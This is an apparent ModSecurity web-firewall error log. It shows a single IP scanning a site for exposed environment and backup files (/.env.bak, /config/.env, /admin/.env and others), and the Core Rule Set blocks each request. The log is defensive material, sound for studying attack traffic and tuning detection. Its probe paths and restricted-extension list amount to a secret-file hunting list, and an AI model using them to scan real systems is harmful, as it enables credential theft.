[Sun Nov 16 06:04:26.028600 2025] [:error] [pid 103398] [client 13.62.46.112:48580] [client 13.62.46.112] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.backup"] [unique_id "aRlbWrczEoTwe_Jf335FWwAAAAA"]
[Sun Nov 16 06:04:26.028788 2025] [:error] [pid 103398] [client 13.62.46.112:48580] [client 13.62.46.112] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.backup"] [unique_id "aRlbWrczEoTwe_Jf335FWwAAAAA"]
[Sun Nov 16 06:04:26.028953 2025] [:error] [pid 103398] [client 13.62.46.112:48580] [client 13.62.46.112] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.backup"] [unique_id "aRlbWrczEoTwe_Jf335FWwAAAAA"]
[Sun Nov 16 06:04:50.109738 2025] [:error] [pid 105706] [client 13.62.46.112:40090] [client 13.62.46.112] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.sample"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.sample"] [unique_id "aRlbcvgkUVuXhjEnxphnSQAAAAQ"]
[Sun Nov 16 06:04:50.109942 2025] [:error] [pid 105706] [client 13.62.46.112:40090] [client 13.62.46.112] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.sample"] [unique_id "aRlbcvgkUVuXhjEnxphnSQAAAAQ"]
[Sun Nov 16 06:04:50.110096 2025] [:error] [pid 105706] [client 13.62.46.112:40090] [client 13.62.46.112] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.sample"] [unique_id "aRlbcvgkUVuXhjEnxphnSQAAAAQ"]
[Sun Nov 16 06:04:50.134630 2025] [:error] [pid 103446] [client 13.62.46.112:40116] [client 13.62.46.112] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.save"] [unique_id "aRlbck-c4YqyOTFJOSeIWQAAAAk"]
[Sun Nov 16 06:04:50.134898 2025] [:error] [pid 103446] [client 13.62.46.112:40116] [client 13.62.46.112] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.save"] [unique_id "aRlbck-c4YqyOTFJOSeIWQAAAAk"]
[Sun Nov 16 06:04:50.135086 2025] [:error] [pid 103446] [client 13.62.46.112:40116] [client 13.62.46.112] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.save"] [unique_id "aRlbck-c4YqyOTFJOSeIWQAAAAk"]
[Sun Nov 16 06:04:50.155607 2025] [:error] [pid 105715] [client 13.62.46.112:40092] [client 13.62.46.112] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env~"] [unique_id "aRlbcjHqqjYXoy22w5Lv8AAAAAE"]
[Sun Nov 16 06:04:50.155784 2025] [:error] [pid 105715] [client 13.62.46.112:40092] [client 13.62.46.112] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env~"] [unique_id "aRlbcjHqqjYXoy22w5Lv8AAAAAE"]
[Sun Nov 16 06:04:50.155945 2025] [:error] [pid 105715] [client 13.62.46.112:40092] [client 13.62.46.112] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env~"] [unique_id "aRlbcjHqqjYXoy22w5Lv8AAAAAE"]
[Sun Nov 16 06:04:50.156415 2025] [:error] [pid 105733] [client 13.62.46.112:40088] [client 13.62.46.112] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/.env.old"] [unique_id "aRlbcgm3iQ6of_5tM-vZEwAAAAY"]
[Sun Nov 16 06:04:50.156568 2025] [:error] [pid 105733] [client 13.62.46.112:40088] [client 13.62.46.112] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.old"] [unique_id "aRlbcgm3iQ6of_5tM-vZEwAAAAY"]
[Sun Nov 16 06:04:50.156768 2025] [:error] [pid 105733] [client 13.62.46.112:40088] [client 13.62.46.112] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.old"] [unique_id "aRlbcgm3iQ6of_5tM-vZEwAAAAY"]
[Sun Nov 16 06:04:50.156927 2025] [:error] [pid 105733] [client 13.62.46.112:40088] [client 13.62.46.112] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.old"] [unique_id "aRlbcgm3iQ6of_5tM-vZEwAAAAY"]
[Sun Nov 16 06:04:50.188750 2025] [:error] [pid 105761] [client 13.62.46.112:40124] [client 13.62.46.112] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".swp"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/.env.swp"] [unique_id "aRlbchajcO0QlxhJbyzqWAAAAAo"]
[Sun Nov 16 06:04:50.188895 2025] [:error] [pid 105761] [client 13.62.46.112:40124] [client 13.62.46.112] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.swp"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.swp"] [unique_id "aRlbchajcO0QlxhJbyzqWAAAAAo"]
[Sun Nov 16 06:04:50.189055 2025] [:error] [pid 105761] [client 13.62.46.112:40124] [client 13.62.46.112] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.swp"] [unique_id "aRlbchajcO0QlxhJbyzqWAAAAAo"]
[Sun Nov 16 06:04:50.189198 2025] [:error] [pid 105761] [client 13.62.46.112:40124] [client 13.62.46.112] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.swp"] [unique_id "aRlbchajcO0QlxhJbyzqWAAAAAo"]
[Sun Nov 16 06:04:50.194406 2025] [:error] [pid 105760] [client 13.62.46.112:40128] [client 13.62.46.112] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/.env.bak"] [unique_id "aRlbciX-V6YaRQK52Hc1_wAAAAU"]
[Sun Nov 16 06:04:50.194540 2025] [:error] [pid 105760] [client 13.62.46.112:40128] [client 13.62.46.112] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.bak"] [unique_id "aRlbciX-V6YaRQK52Hc1_wAAAAU"]
[Sun Nov 16 06:04:50.194687 2025] [:error] [pid 105760] [client 13.62.46.112:40128] [client 13.62.46.112] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.bak"] [unique_id "aRlbciX-V6YaRQK52Hc1_wAAAAU"]
[Sun Nov 16 06:04:50.194841 2025] [:error] [pid 105760] [client 13.62.46.112:40128] [client 13.62.46.112] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.bak"] [unique_id "aRlbciX-V6YaRQK52Hc1_wAAAAU"]
[Sun Nov 16 06:04:50.215663 2025] [:error] [pid 103401] [client 13.62.46.112:40100] [client 13.62.46.112] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.orig"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.orig"] [unique_id "aRlbcr5rejGDIGJeuSGFzQAAAAM"]
[Sun Nov 16 06:04:50.215824 2025] [:error] [pid 103401] [client 13.62.46.112:40100] [client 13.62.46.112] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.orig"] [unique_id "aRlbcr5rejGDIGJeuSGFzQAAAAM"]
[Sun Nov 16 06:04:50.215965 2025] [:error] [pid 103401] [client 13.62.46.112:40100] [client 13.62.46.112] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.orig"] [unique_id "aRlbcr5rejGDIGJeuSGFzQAAAAM"]
[Sun Nov 16 06:04:51.891918 2025] [:error] [pid 105762] [client 13.62.46.112:40146] [client 13.62.46.112] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/config/.env"] [unique_id "aRlbc4CWhPvKE5MvVu03RgAAAAs"]
[Sun Nov 16 06:04:51.892148 2025] [:error] [pid 105762] [client 13.62.46.112:40146] [client 13.62.46.112] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/config/.env"] [unique_id "aRlbc4CWhPvKE5MvVu03RgAAAAs"]
[Sun Nov 16 06:04:51.892324 2025] [:error] [pid 105762] [client 13.62.46.112:40146] [client 13.62.46.112] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/config/.env"] [unique_id "aRlbc4CWhPvKE5MvVu03RgAAAAs"]
[Sun Nov 16 06:04:52.527545 2025] [:error] [pid 103398] [client 13.62.46.112:40154] [client 13.62.46.112] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/admin/.env"] [unique_id "aRlbdLczEoTwe_Jf335FXAAAAAA"]
[Sun Nov 16 06:04:52.527853 2025] [:error] [pid 103398] [client 13.62.46.112:40154] [client 13.62.46.112] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/admin/.env"] [unique_id "aRlbdLczEoTwe_Jf335FXAAAAAA"]
[Sun Nov 16 06:04:52.528119 2025] [:error] [pid 103398] [client 13.62.46.112:40154] [client 13.62.46.112] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/admin/.env"] [unique_id "aRlbdLczEoTwe_Jf335FXAAAAAA"]
[Sun Nov 16 06:04:52.888203 2025] [:error] [pid 105754] [client 13.62.46.112:40132] [client 13.62.46.112] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/admin/.env.save"] [unique_id "aRlbdH3mxOhUaPa_1PS3NAAAAAw"]
[Sun Nov 16 06:04:52.888423 2025] [:error] [pid 105754] [client 13.62.46.112:40132] [client 13.62.46.112] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/admin/.env.save"] [unique_id "aRlbdH3mxOhUaPa_1PS3NAAAAAw"]
[Sun Nov 16 06:04:52.888582 2025] [:error] [pid 105754] [client 13.62.46.112:40132] [client 13.62.46.112] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/admin/.env.save"] [unique_id "aRlbdH3mxOhUaPa_1PS3NAAAAAw"]
[Sun Nov 16 06:04:52.918370 2025] [:error] [pid 105706] [client 13.62.46.112:40160] [client 13.62.46.112] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/api/.env.old"] [unique_id "aRlbdPgkUVuXhjEnxphnSgAAAAQ"]
